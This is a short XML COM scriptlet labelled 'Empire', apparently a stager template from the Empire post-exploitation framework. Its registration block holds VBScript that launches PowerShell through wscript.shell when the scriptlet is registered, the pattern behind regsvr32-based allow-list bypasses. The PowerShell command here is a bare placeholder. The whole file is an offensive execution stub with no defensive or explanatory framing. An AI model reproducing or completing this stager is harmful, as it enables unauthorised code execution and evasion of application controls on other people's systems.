<?XML version="1.0"?>
<scriptlet>

<registration
        description="Empire"
        progid="Empire"
        version="1.00"
        classid="{20001111-0000-0000-0000-0000FEEDACDC}"
        >
        <script language="VBScript">
                <![CDATA[
                        createobject("wscript.shell").run "powershell"
                ]]>
</script>
</registration>


</scriptlet>